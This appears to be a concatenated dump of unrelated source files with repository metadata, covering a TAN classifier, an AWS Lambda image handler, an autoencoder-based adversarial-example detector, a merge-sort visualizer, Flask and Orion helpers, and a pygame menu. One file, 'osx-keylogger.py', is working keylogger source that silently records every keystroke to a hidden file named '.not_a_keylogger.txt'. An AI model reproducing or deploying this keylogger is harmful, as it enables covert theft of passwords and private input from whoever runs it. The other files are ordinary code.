G = nx.from_scipy_sparse_matrix(minimum_spanning_tree(csr_matrix(tempMatrix)))
MaxG = nx.DiGraph()
adjList = G.adjacency_list()
notReturnable = {}
i = 0
MaxG = getDirectedTree(adjList, notReturnable, MaxG, i)
#nx.draw_random(MaxG)
#plt.show()
return MaxG
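# Note on the weights above: for Gaussian features -0.5*log(1 - r^2) is the
# pairwise mutual information, so the class-weighted 0.5*log(1 - (r - R)^2)
# scores are most negative for the most dependent feature pairs and the
# *minimum* spanning tree keeps exactly those edges; getDirectedTree below
# then roots the undirected tree at node 0 to obtain the directed TAN tree.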
def getDirectedTree(adjList, notReturnable, MaxG, i):
x = adjList[i]
L = []
for y in x:
if y not in notReturnable:
notReturnable[y] = {}
if i not in notReturnable:
notReturnable[i] = {}
if i not in notReturnable[y] and y not in notReturnable[i]:
MaxG.add_edge(i, y)
L.append(y)
notReturnable[y][i] = 1
notReturnable[i][y] = 1
for y in L:
MaxG = getDirectedTree(adjList,notReturnable,MaxG, y)
return MaxG
def infer(Tree, data, testdata):
Param = getParam(data)
# Do topological sort to figure out nodes with least number of dependence
Nodes = nx.topological_sort(Tree)
    Prod = 10.0**300  # large start value to offset pdf underflow (10.0**400 overflows a float)
for i in Nodes:
mean, Var = Param[i]
Sum = 0
L = []
for x in Tree.predecessors(i):
if x != i:
Parentmean, ParentVar = Param[x]
PCov = np.cov([data[i], data[x]])[0][1]
PBeta = PCov/ParentVar
Sum += PBeta * (testdata[x] - Parentmean)
L.append(x)
mean += Sum
if len(L) > 0:
Depend = [data[i]]
num, dem = 0, 0
for k in L:
Depend = np.vstack((Depend, data[k]))
Parent = Depend[1:]
if len(Parent) > 2:
num = np.linalg.det(np.cov(Depend))
dem = np.linalg.det(np.cov(Parent))
#print "1 COV:" ,num, dem
if len(Parent) == 2:
num = np.linalg.det(np.cov(Depend))
dem = np.linalg.det(np.cov(Parent)) + 0.0000001
#print "2 COV:", num, dem
if len(Parent) == 1:
num = np.linalg.det(np.cov(Depend)) + 0.0000001
dem = np.var(Parent)
#print "3 COV:", num, dem
Var = num / dem
Std = math.sqrt(Var)
rv = norm(loc=mean, scale=Std)
if rv.pdf(testdata[i]) > 0.0000001:
Prod *= rv.pdf(testdata[i])
return Prod
def cv_TAN(traindata, trainlabels, R=0.005):
n = 16
i = 0
Accuracy = []
while i < n:
train, tlabel, test, label = CVsplit(traindata, trainlabels, i)
dataP, dataS = getClassConditionalData(train, tlabel)
Pp, Ps = getClassProbability(tlabel)
Tree = learnStructure(dataP, dataS, Pp, Ps, R)
mylabel = []
for x in test:
PProd = Pp * infer(Tree, dataP, x)
SProd = Ps * infer(Tree, dataS, x)
temp = PProd + SProd
PProd = PProd/temp
SProd = SProd/temp
if SProd >= PProd:
mylabel.append('S')
else:
mylabel.append('P')
Accuracy.append(accuracy_score(label, mylabel))
#print "Accuracy:", float(correct)/float(len(label))
#print "Accuracy: attempt",i, ": ", accuracy_score(label, mylabel)
#print "(Precision, Recall, F1-Score)", precision_recall_fscore_support(label, mylabel)
i += 1
return sum(Accuracy)/len(Accuracy)
if __name__ == "__main__":
data, labels = loadData("active500.mat")
TANAcc, GaussAcc = [], []
for y in range(1):
traindata, trainlabels, testdata, testlabels = shuffle(data, labels)#CVsplit(data, labels)
#temp = cv_TAN(traindata,trainlabels)
#print "CV", temp
dataP, dataS = getClassConditionalData(traindata, trainlabels)
Pp, Ps = getClassProbability(trainlabels)
Tree = learnStructure(dataP, dataS, Pp, Ps)
mylabel = []
for x in testdata:
PProd = Pp * infer(Tree, dataP, x)
SProd = Ps * infer(Tree, dataS, x)
temp = PProd + SProd
PProd = PProd/temp
SProd = SProd/temp
if SProd >= PProd:
mylabel.append('S')
else:
mylabel.append('P')
TANAcc.append(accuracy_score(testlabels,mylabel))
#print "Accuracy:", accuracy_score(testlabels, mylabel)
#print "(Precision, Recall, F1-Score)", precision_recall_fscore_support(testlabels,mylabel)
Gauss = GaussianNB()
#print "Gaussian:", fitAndPredict(Gauss, traindata, trainlabels,testdata, testlabels)
GaussAcc.append(fitAndPredict(Gauss, traindata, trainlabels, testdata, testlabels))
print "TAN:", sum(TANAcc)/len(TANAcc)
print "GAUSS:", sum(GaussAcc)/len(GaussAcc)
#cross_validate(traindata,trainlabels)
#clf, Gauss, neigh = cross_validate(traindata,trainlabels)
    #trainAndtest(traindata, trainlabels, testdata, testlabels)
|
[
"sriganesh.navaneethakrishnan@stonybrook.edu"
] |
sriganesh.navaneethakrishnan@stonybrook.edu
|
89ffc31de335cf350cd6134d4c7c876e058d339a
|
7f666c62a4e02a9688beede315c5b79831307679
|
/osx-keylogger.py
|
632a08f9e62e8d04e2a53df3dba7057142c4c7be
|
[] |
no_license
|
ianng31/something-awesome
|
3f8520191f39f2f87ddafc31f7ed350df329828a
|
55c5d918aefb4f558f227d846dc20aa9f4cb2f77
|
refs/heads/master
| 2022-11-25T20:39:00.654518
| 2020-08-03T13:32:11
| 2020-08-03T13:32:11
| 254,847,276
| 0
| 1
| null | 2020-08-03T13:32:12
| 2020-04-11T10:51:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
#!/usr/bin/python
import pynput.keyboard
import smtplib
import threading
import os
from pathlib import Path
class Keylogger:
def __init__(self):
#constructor
HOME = str(Path.home())
self.filepath = f"{HOME}/.not_a_keylogger.txt"
self.header = "[ Initiating Logging ]\n"
def evaluate_keys(self, key):
try:
            # str(key.char) works for printable keys; special keys raise AttributeError (handled below)
Pressed_key = str(key.char)
except AttributeError:
if key == key.space: # Show actual space instead of key.space
Pressed_key = " "
elif key == key.enter:
Pressed_key = "\n"
else:
Pressed_key = " " + str(key) + " "
#Now appending the key pressed
self.log(Pressed_key)
def log(self, logger_text):
FILE_MODE = "a+"
with open(f'{self.filepath}', FILE_MODE) as logfile:
logfile.write(logger_text)
def start(self):
keyboard_listener = pynput.keyboard.Listener(on_press=self.evaluate_keys)
with keyboard_listener:
self.log(self.header)
keyboard_listener.join()
if __name__ == "__main__":
my_keylogger = Keylogger()
my_keylogger.start()
|
[
"z5257343@unsw.edu.au"
] |
z5257343@unsw.edu.au
|
a7e4199230593411dcc6621ba9314e67f00f7537
|
d54d97946c90c7b96fd27a174c29ef94093d461a
|
/S2_Mobilenet_QuadCopters_Lambda/AWS Lambda Files/handler.py
|
6e76e06c0157bc575380fe11fbff98f7a321f3ec
|
[
"MIT"
] |
permissive
|
pranavpandey2511/Deep_Learning_EVA4_Phase2
|
b13a281b1b0d18c4a344484334984d3f2b702e4d
|
b01045c051184f627df6e9e8e26ec5a057c01d3a
|
refs/heads/master
| 2023-04-01T20:44:46.104454
| 2021-04-04T13:21:29
| 2021-04-04T13:21:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,129
|
py
|
try:
print('Import unzip')
import unzip_requirements
except ImportError:
pass
import torch
import torchvision
import torchvision.transforms as transforms
from PIL import Image
import boto3
import os
import io
import json
import base64
from requests_toolbelt.multipart import decoder
print("Import End.....")
#define env-variables - if none exists
S3_BUCKET = os.environ['S3_BUCKET'] if 'S3_BUCKET' in os.environ else 'eva4p2-s2-anilbhatt1'
MODEL_PATH = os.environ['MODEL_PATH'] if 'MODEL_PATH' in os.environ else 's2_mobilenetv2.pt'
print('Downloading Model....')
s3 = boto3.client('s3')
try:
if os.path.isfile(MODEL_PATH) != True:
obj = s3.get_object(Bucket=S3_BUCKET, Key=MODEL_PATH)
print('creating bytestream')
bytestream = io.BytesIO(obj['Body'].read())
print('Loading Model...')
model = torch.jit.load(bytestream)
print('Model loaded...')
except Exception as e:
print(repr(e))
raise(e)
def transform_image(image_bytes):
try:
transformations = transforms.Compose([
transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485,0.456,0.406], std=[0.229,0.224,0.225])])
image = Image.open(io.BytesIO(image_bytes))
return transformations(image).unsqueeze(0)
except Exception as e:
print(repr(e))
raise(e)
def get_prediction(image_bytes):
tensor = transform_image(image_bytes=image_bytes)
print('Transformed the image')
return model(tensor).argmax().item()
def classify_image(event, context):
try:
content_type_header = event['headers']['content-type']
print(event['body'])
body = base64.b64decode(event['body'])
print('Body Loaded')
picture = decoder.MultipartDecoder(body, content_type_header).parts[0]
print('Picture Decoded')
prediction = get_prediction(image_bytes=picture.content)
print(prediction)
print('Disposition:', picture.headers[b'Content-Disposition'])
filename = picture.headers[b'Content-Disposition'].decode().split(';')[1].split('=')[1]
print('filename:',filename)
if len(filename) < 4:
filename=picture.headers[b'Content-Disposition'].decode().split(';')[2].split('=')[1]
print('Inside if')
return{
"statusCode":200,
"headers": {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True
},
"body" : json.dumps({'file':filename.replace('"',''), 'predicted': prediction})
}
except Exception as e:
print('Entering exception')
print(repr(e))
return{
"statusCode":500,
"headers": {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True
},
"body" : json.dumps({"error":repr(e)})
}
|
[
"noreply@github.com"
] |
pranavpandey2511.noreply@github.com
|
3cabf5589b831a4fbf0fd405ef5e4af61faf027f
|
3d5e86cb6cc01729170d5d445f958354f72c1462
|
/code/ae-with-svm.py
|
ad9728c56a9e4f773ddc89c9ec683f9dbf36c0e2
|
[] |
no_license
|
ianchen88/attack-agnostic-adversarial-attack-detection
|
32e20624a4b63cc454912865915c2bd1fcdda247
|
8df0a700300986ae7962c14cef7e60a811b03b8f
|
refs/heads/master
| 2023-02-14T02:00:02.062950
| 2021-01-11T14:41:29
| 2021-01-11T14:41:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,554
|
py
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
import visdom
from ShapDataset import ShapDatasetTop
# Ignore warnings from sklearn
import warnings
warnings.filterwarnings("ignore")
from sklearn.model_selection import StratifiedShuffleSplit, GridSearchCV
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.svm import SVC
from sklearn import preprocessing
import argparse
from utils import AverageMeter, VisdomLinePlotter, LogisticRegression, train_logistic_regression_epoch, \
test_logistic_regression_epoch, ReconErrorDataset
import numpy as np
import pandas as pd
import pickle
import random
import math
import tqdm
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('normal_path', help='Location to saved normal SHAP values', type=str)
arg_parser.add_argument('adversarial_path', help='Location to saved adversarial SHAP values', type=str)
arg_parser.add_argument('--plot', help='Name of visdom plot', type=str, default='ae_with_svm')
arg_parser.add_argument('--batch_size', type=int, default=128, metavar='N',
help='input batch size for training (default: 128)')
arg_parser.add_argument('--epochs', type=int, default=100, metavar='N', help='number of epochs to train (default: 100)')
arg_parser.add_argument('--svm', help='Use SVM on reconstruction error (else use LR)', action='store_true')
arg_parser.add_argument('--save', help='Location to save model to', type=str, default=None)
arg_parser.add_argument('--load', help='Location to load model from', type=str, default=None)
arg_parser.add_argument('--save_recon_error', help='Location to save reconstruction errors to', type=str, default=None)
arg_parser.add_argument('--save_svm', help='Location to save recon. err. SVM to', type=str, default=None)
arg_parser.add_argument('--n_jobs', help='Number of parallel instances for grid search', type=int, default=None)
args = arg_parser.parse_args()
print('=================== Loading dataset')
dataset = ShapDatasetTop(args.normal_path, args.adversarial_path, normal_only=True, normalise=True)
dataset_all = ShapDatasetTop(args.normal_path, args.adversarial_path, normal_only=False, normalise=True)
# Get adversarial samples only, bit of a cheat way
adv_samples = pd.DataFrame(dataset_all.adversarial)
adv_samples = adv_samples.fillna(0)
normal_samples = pd.DataFrame(dataset.normal)
normal_samples = normal_samples.fillna(0)
global plotter
plotter = VisdomLinePlotter(args.plot)
# https://docs.microsoft.com/en-us/archive/msdn-magazine/2019/april/test-run-neural-anomaly-detection-using-pytorch
class Autoencoder(nn.Module):
def __init__(self):
super(Autoencoder, self).__init__()
self.l1 = nn.Linear(100, 50)
self.l2 = nn.Linear(50, 25)
self.l3 = nn.Linear(25, 50)
self.l4 = nn.Linear(50, 100)
def forward(self, x):
z = torch.tanh(self.l1(x))
z = torch.tanh(self.l2(z))
z = torch.tanh(self.l3(z))
z = torch.tanh(self.l4(z))
return z
class AutoencoderTest(nn.Module):
def __init__(self):
super(AutoencoderTest, self).__init__()
self.e1 = nn.Linear(100, 80)
self.e2 = nn.Linear(80, 20)
self.d1 = nn.Linear(20, 80)
self.d2 = nn.Linear(80, 100)
def forward(self, x):
x = F.relu(self.e1(x))
x = F.relu(self.e2(x))
x = F.relu(self.d1(x))
x = F.relu(self.d2(x))
return x
class ConvAutoencoder(nn.Module):
def __init__(self):
super(ConvAutoencoder, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 5)
self.conv2 = nn.Conv2d(16, 4, 5)
self.pool = nn.MaxPool2d(2, 2)
self.t_conv1 = nn.ConvTranspose2d(4, 16, 2, stride=2)
self.t_conv2 = nn.ConvTranspose2d(16, 3, 2, stride=2)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = F.relu((self.conv2(x)))
x = self.pool(x)
x = F.relu(self.t_conv1(x))
x = F.relu((self.t_conv2(x)))
return x
model = AutoencoderTest()
#model = ConvAutoencoder()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("======================= Using device:", device)
model = model.to(device)
opt = optim.Adam(model.parameters(), lr=0.01)
print("====================== Loading data")
# Randomly create training and validation datasets (for now)
train_size = int(0.8 * len(dataset))
val_size = len(dataset) - train_size
indices = list(range(len(dataset)))
np.random.shuffle(indices)
train_indices, val_indices = indices[:train_size], indices[train_size:]
train_sampler = torch.utils.data.sampler.SubsetRandomSampler(train_indices)
val_sampler = torch.utils.data.sampler.SubsetRandomSampler(val_indices)
batch_size = args.batch_size
epochs = args.epochs
train_loader = DataLoader(dataset, batch_size=batch_size, sampler=train_sampler)
test_loader = DataLoader(dataset, batch_size=1, sampler=val_sampler)
model = model.train()
model = model.double()
loss = nn.MSELoss()
#loss = nn.L1Loss()
# No need to train if we're loading a model
if args.load is None:
losses = AverageMeter()
for epoch in range(epochs):
for data, labels in train_loader:
data = data.requires_grad_()
data = data.to(device)
labels = labels.to(device)
opt.zero_grad()
output = model(data)
loss_obj = loss(output, data)
loss_obj.backward()
opt.step()
losses.update(loss_obj.data, len(data))
plotter.plot('loss-ae', 'train', 'Class Loss', epoch, losses.avg.cpu())
print('Epoch {} loss: {}'.format(epoch, losses.avg.cpu()))
if args.save is not None:
with open(args.save, 'wb') as f:
torch.save(model, f)
else:
with open(args.load, 'rb') as f:
model = torch.load(f)
model = model.eval()
print('====================== Calculating final reconstruction loss for all train data')
# Get the normal and adv. samples from our train data
dataloader = DataLoader(dataset_all, batch_size=1)
all_train_recon_errors = []
all_train_labels = []
with tqdm.tqdm(total=len(dataloader)) as progress:
for inputs, labels in dataloader:
inputs = inputs.to(device)
output = model(inputs)
error = torch.mean((inputs[0] - output[0]) * (inputs[0] - output[0]))
all_train_recon_errors.append(error.data.item())
all_train_labels.append(labels[0].data.item())
progress.update(1)
# Make the errors into a pandas dataframe so we can easily feed it into an SVM
error_df = pd.DataFrame(all_train_recon_errors)
error_labels_df = pd.DataFrame(all_train_labels)
# Because we have such imbalanced classes, we need more adv. samples so that we don't just classify all normal samples
# correctly and be done with it
# This isn't the best way to do this, but for now we will see if it works
num_normal = len(error_labels_df[error_labels_df[0] == 0])
num_adv = len(error_labels_df[error_labels_df[0] == 1])
# How many times do we have to repeat the adv. set to get around the same number of samples?
repeat = int(num_normal / num_adv)
# Get the adv. samples
locs = error_labels_df.index[error_labels_df[0] == 1].tolist()
adv_samples = error_df.loc[locs]
for i in range(repeat):
error_df = error_df.append(adv_samples, ignore_index=True)
error_labels_df = error_labels_df.append(error_labels_df.loc[locs], ignore_index=True)
err_dataset = ReconErrorDataset(error_df, error_labels_df)
if not args.svm:
print('====================== Training Logistic Regression on reconstruction errors')
train_size = int(0.8 * len(err_dataset))
val_size = len(err_dataset) - train_size
indices = list(range(len(err_dataset)))
np.random.shuffle(indices)
train_indices, val_indices = indices[:train_size], indices[train_size:]
train_sampler = torch.utils.data.sampler.SubsetRandomSampler(train_indices)
val_sampler = torch.utils.data.sampler.SubsetRandomSampler(val_indices)
err_train_loader = DataLoader(err_dataset, batch_size=32, sampler=train_sampler)
err_val_loader = DataLoader(err_dataset, batch_size=1, sampler=val_sampler)
model = LogisticRegression(1, 1)
model = model.double()
model = model.to(device)
loss = nn.BCELoss()
opt = optim.SGD(model.parameters(), 0.001)
best = 0
for epoch in range(100):
train_logistic_regression_epoch(model, loss, opt, err_train_loader, plotter, device, epoch)
acc = test_logistic_regression_epoch(model, err_val_loader, loss, plotter, device, epoch)
best = max(acc, best)
print('** Validation: %f (best) - %f (current)' % (best, acc))
else:
print('====================== Training SVM on reconstruction errors')
sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2)
split = sss.split(error_df, error_labels_df)
for train_indices, test_indices in split:
data_train, labels_train = error_df.iloc[train_indices], error_labels_df.iloc[train_indices]
data_test, labels_test = error_df.iloc[test_indices], error_labels_df.iloc[test_indices]
data_train = preprocessing.scale(data_train)
data_test = preprocessing.scale(data_test)
# Hyperparameters we want to search over
param_grid = [{'kernel': ['linear'], 'C': [0.1, 1.0, 10, 100], 'shrinking': [True]},
{'kernel': ['rbf'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'shrinking': [True]},
{'kernel': ['poly'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'degree': [2, 3, 4], 'shrinking': [True]},
{'kernel': ['sigmoid'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'shrinking': [True]}]
grid = GridSearchCV(SVC(), param_grid, refit=True, verbose=2, n_jobs=args.n_jobs)
grid.fit(data_train, labels_train.values.ravel())
#svm = SVC(kernel='rbf', shrinking=True)
#svm.fit(data_train, labels_train)
print('====================== SVM trained')
print('====================== Best parameters found were:\n')
print(grid.best_params_)
if args.save_svm is not None:
print('====================== Saving SVM to {}'.format(args.save_svm))
with open(args.save_svm, 'wb') as f:
pickle.dump(grid, f)
print('====================== SVM saved')
# Try going through a test set and seeing if we can find the adv. samples
normal_correct = 0
adv_correct = 0
normal_total = 0
adv_total = 0
print('====================== Testing SVM')
with tqdm.tqdm(total=len(data_test)) as progress:
for i in range(len(data_test)):
error = data_test[i]
label = labels_test.iloc[i].values[0]
pred = grid.predict([error])
print('Error of sample was {}, label of sample was {}, predicted label was {}'.format(error,
label,
pred[0]))
if pred[0] == 1:
adv = True
else:
adv = False
if label == 1:
if adv:
adv_correct += 1
adv_total += 1
else:
if not adv:
normal_correct += 1
normal_total += 1
progress.update(1)
print('Acc. on normal data: {}\nAcc. on adv. data: {}'.format(normal_correct / normal_total,
adv_correct / adv_total))
preds = grid.predict(data_test)
conf_matrix = confusion_matrix(labels_test, preds).tolist()
class_report = classification_report(labels_test, preds)
results = "{} \n\n {}".format(conf_matrix, class_report)
print(results)
"""max_error = 0
# Go through test data, find largest error
for data, labels in test_loader:
data = data.to(device)
labels = labels.to(device)
output = model(data)
for j in range(len(output)):
error = torch.sum((data[j] - output[j]) * (data[j] - output[j]))
if error > max_error:
max_error = error
print('Found max error at index {}'.format(j))"""
|
[
"matthew.s.watson@durham.ac.uk"
] |
matthew.s.watson@durham.ac.uk
|
968c2f037dcf0c1535623c94568e21ba2eca4b62
|
dfcbc222a2ff47577a5afa6c987bf10f7a098444
|
/Algorithms/mergeSort.py
|
9c6487a09c6bc44cf0ec7017ce6a5f82fcef425b
|
[] |
no_license
|
AshDev07/Sorting-Algorithm-Visualizer
|
eb71b30076493ca591271b34024fa27dff4911eb
|
14300f391a393942cd43d46c7f391a1cc3664b6f
|
refs/heads/master
| 2023-06-15T10:36:59.380842
| 2021-07-16T05:18:29
| 2021-07-16T05:18:29
| 386,516,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,107
|
py
|
import time
from colors import *
def merge(data, start, mid, end, drawData, timeTick):
p = start
q = mid + 1
tempArray = []
for i in range(start, end + 1):
if p > mid:
tempArray.append(data[q])
q += 1
elif q > end:
tempArray.append(data[p])
p += 1
elif data[p] < data[q]:
tempArray.append(data[p])
p += 1
else:
tempArray.append(data[q])
q += 1
for p in range(len(tempArray)):
data[start] = tempArray[p]
start += 1
def merge_sort(data, start, end, drawData, timeTick):
if start < end:
mid = int((start + end) / 2)
merge_sort(data, start, mid, drawData, timeTick)
merge_sort(data, mid + 1, end, drawData, timeTick)
merge(data, start, mid, end, drawData, timeTick)
drawData(data, [PURPLE if start <= x < mid else YELLOW if x == mid
else DARK_BLUE if mid < x <= end else BLUE for x in range(len(data))])
time.sleep(timeTick)
drawData(data, [BLUE for x in range(len(data))])
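# Standalone sketch (assumes colors.py is importable; drawData is replaced by a
# no-op so no canvas is needed, and timeTick is 0):
#   data = [5, 2, 9, 1, 7]
#   merge_sort(data, 0, len(data) - 1, lambda d, palette: None, 0)
#   # data is now [1, 2, 5, 7, 9]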
|
[
"ashdev420@gmail.com"
] |
ashdev420@gmail.com
|
032a7ceb5003e13ea27838cbb1ddebe1a067b09b
|
5570482103d38e396ca9c279aeaa5026294bb6e8
|
/mapcampus/campusuh/campusuhapp/templatetags/my_filters.py
|
5885dcb6ccb8866bcac23fff9f23b02f8ef8b4af
|
[] |
no_license
|
jchilela/mapcampus
|
0719bf235d889813f8855839ec5fa43113b2039a
|
348e8d6d1187c1f93e8905070c1b4873d2d812a6
|
refs/heads/master
| 2021-01-10T08:59:28.112116
| 2016-01-22T21:43:48
| 2016-01-22T21:43:48
| 43,837,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django import template
register = template.Library()
@register.filter(name='times')
def times(number):
return range(number)
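# Template usage sketch (num_columns is a hypothetical context variable):
#   {% load my_filters %}
#   {% for i in num_columns|times %} ... {% endfor %}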
|
[
"juliogabrielchilela1@MacBook-Pro-de-Julio.local"
] |
juliogabrielchilela1@MacBook-Pro-de-Julio.local
|
f3b66dd18e7b1ad969e37992945448218ff06c52
|
c117e905ac5f1938da3c8e23845ad52cc922923a
|
/src/orion/testing/dummy_algo.py
|
a506d3f2ce928d707c48ca086fd7b0bb315a602b
|
[
"BSD-3-Clause"
] |
permissive
|
Epistimio/orion
|
2850983dd7ac0a417d451d39b2dc7a652f1920c8
|
2944875eff03b86138d6780df4b1dd6dc8158ccb
|
refs/heads/develop
| 2023-09-01T20:36:59.279966
| 2023-08-21T13:25:43
| 2023-08-21T13:25:43
| 102,697,867
| 218
| 41
|
NOASSERTION
| 2023-08-21T12:51:55
| 2017-09-07T06:05:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,274
|
py
|
"""A dummy algorithm used for unit tests."""
from __future__ import annotations
from typing import ClassVar, Sequence
from orion.algo.base import BaseAlgorithm
from orion.algo.space import Space
from orion.core.worker.trial import Trial
class FixedSuggestionAlgo(BaseAlgorithm):
"""A dumb algo that always returns the same trial."""
requires_type: ClassVar[str | None] = "real"
requires_shape: ClassVar[str | None] = "flattened"
requires_dist: ClassVar[str | None] = "linear"
def __init__(
self,
space: Space,
fixed_suggestion: Trial | None = None,
seed: int | Sequence[int] | None = None,
):
super().__init__(space)
self.seed = seed
self.fixed_suggestion = fixed_suggestion or space.sample(1, seed=seed)[0]
assert self.fixed_suggestion in space
def suggest(self, num):
# NOTE: can't register the trial if it's already here. The fixed suggestion is always "new",
# but the algorithm actually observes it at some point. Therefore, we don't overwrite what's
# already in the registry.
if not self.has_suggested(self.fixed_suggestion):
self.register(self.fixed_suggestion)
return [self.fixed_suggestion]
return []
|
[
"noreply@github.com"
] |
Epistimio.noreply@github.com
|
f3a4db1d6675424c9492749e73ee9c8f7c2fba7a
|
3b7a061e406e072de15af4e92216b4800da0edba
|
/arquivo.py
|
ca910db9ad7cf626f990f1a7ed32e78b9b8ce7b9
|
[] |
no_license
|
juliakastrup/1stG
|
45df5278f441f2fab88324282225003f8f18c7af
|
57a08eec627ddd860f3e5ba1785f9f51c87976c3
|
refs/heads/master
| 2021-09-23T22:33:19.845219
| 2018-09-28T14:23:09
| 2018-09-28T14:23:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
num1=234
num2=7869
if num1>num2:
print('Sim, {num1} é maior que {num2}!'.format(num1=num1,num2=num2))
else:
print('Não, {num1} não é maior que {num2}!'.format(num1=num1,num2=num2))
name='Paulo'
if name=='Angela':
print('Hey, Angela!')
elif name=='Julia':
print('Hey, Julia!')
elif name=='Paulo':
print('Hey, Paulo!')
elif name=='Bernardo':
print('Hey, Bernardo!')
else:
print('Hey, esquisito!')
|
[
"jkastrupb@gmail.com"
] |
jkastrupb@gmail.com
|
717927f5abd794acc318f554bc19ae9d85c66dd1
|
a58a2dee264e11eaf0397f054545156871eafb4d
|
/services/calc.py
|
695be6ab14159754c464ef80f517c638de23821e
|
[] |
no_license
|
bewakes/assistant
|
b157c7ead508a5a490d19cfe2fd479a4d0562304
|
ff336866a19b7b8c8cd971e340812b8d7c865af1
|
refs/heads/master
| 2022-12-10T04:24:18.230269
| 2020-04-28T15:41:54
| 2020-04-28T15:41:54
| 92,492,350
| 3
| 1
| null | 2021-06-01T23:24:07
| 2017-05-26T09:00:27
|
Python
|
UTF-8
|
Python
| false
| false
| 811
|
py
|
import sys
import os
import traceback
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.socket_mixin import SocketHandlerMixin # noqa
from utils import log # noqa
from utils.terminal_formatter import Style
logger = log.get_logger('Calculator service')
class Calculator(SocketHandlerMixin):
def __init__(self):
super().__init__()
def handle_calc(self, args):
expression = ''.join(args)
try:
return Style.green(str(eval(expression)))
except Exception as e:
return Style.red(str(e))
if __name__ == '__main__':
c = Calculator()
port = sys.argv[1]
try:
c.initialize_and_run(port)
except SystemExit:
pass
except Exception:
logger.error(traceback.format_exc())
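# Quick sanity-check sketch, bypassing the socket layer (assumes
# SocketHandlerMixin.__init__ takes no arguments, as the constructor implies,
# and that Style.green simply wraps the string in terminal colour codes):
#   Calculator().handle_calc(["2", "+", "3*4"])   # -> green-styled "14"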
|
[
"spirit_bibek@yahoo.com"
] |
spirit_bibek@yahoo.com
|
017c7642c90d6d18f5006df5ea73ea024724ee0a
|
1f56449c4003dcbe968a5c0c58b9444a80d8ad7a
|
/config.py
|
ec1becb0182eeba911bef9837a311f8d48d69a9a
|
[] |
no_license
|
kevinbsilva/flask_app
|
0b311b8cdee5ffbadeefbaf5bb646128d1affabe
|
7a28103baca0a3a88910b28ddb730e3d042fd0ca
|
refs/heads/master
| 2023-02-15T04:07:31.790010
| 2020-12-29T02:27:37
| 2020-12-29T02:27:37
| 325,145,995
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
MYSQL_DATABASE_URI = os.environ.get('DATABASE_URL') or 'mysql://{host}:{port}/{db_name}'.format(host='localhost', port='3306', db_name='flask')
MYSQL_TRACK_MODIFICATIONS = False
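# Usage sketch (standard Flask pattern):
#   from flask import Flask
#   app = Flask(__name__)
#   app.config.from_object(Config)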
|
[
"kevinbarranco.silva@outlook.com"
] |
kevinbarranco.silva@outlook.com
|
6d00b32fd8ad012ae7a155e43f412b5cf8570a59
|
e24c66c8ed326f3486c053c25644cb2b183efe9c
|
/card_example/src/screens/screens/language_screen.py
|
2f72238aaf25ad7dcae3fcaaeafdb04bedbecd3f
|
[
"MIT"
] |
permissive
|
jldj1/card-example
|
7f87a0b335ee6a80fa0ccce16af3aecdf8a8e592
|
bf2b4519e7ee67d3f8e03a50fcdb4b003c535bea
|
refs/heads/main
| 2023-08-28T04:17:18.185896
| 2021-10-29T02:27:16
| 2021-10-29T02:27:16
| 422,416,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,320
|
py
|
import pygame, sys
from buttons.button import Button
from screens.blank_screen2 import Blank2
BG_COLOR = (30, 30, 30)
BLACK_COLOR = (0, 0, 0)
class LanguageSelect:
def __init__(self):
self.width = 600
self.height = 600
self.setup_screen()
self.click = False
self.running = True
# self, screen, x, y, width, height, text="", color=(DARK_GREY)
self.button = Button(self.screen, self.width // 2 - 100, self.height // 2 - 25, 200, 50, "English",
BLACK_COLOR)
self.button2 = Button(self.screen, self.width // 2 - 100, self.height // 2 - 75, 200, 50, "Spanish",
BLACK_COLOR)
self.clock = pygame.time.Clock()
self.language = "English"
def draw(self):
self.screen.fill(BG_COLOR)
        # screen.fill always in beginning of draw func
self.button.draw()
self.button2.draw()
# display.update() always in end of draw func
pygame.display.update()
def getLanguage(self):
return self.language
def setup_screen(self):
self.screen = pygame.display.set_mode((self.width, self.height))
pygame.display.set_caption("Blank Template Screen")
def run(self):
while self.running:
pos = pygame.mouse.get_pos()
print(self.language)
self.draw()
if self.button.collides(pos):
if self.click:
print("ENGLISH SELECTED")
self.language = "English"
if self.button2.collides(pos):
if self.click:
print("ESPANOL EELCTED")
self.language = "Spanish"
self.click = False
for event in pygame.event.get():
self.handle_event(event)
self.clock.tick(60)
def handle_event(self, event):
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
self.click = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.running = False
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
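# Usage sketch (assumes pygame.init() has been called by the caller):
#   screen = LanguageSelect()
#   screen.run()                  # blocks until Escape is pressed
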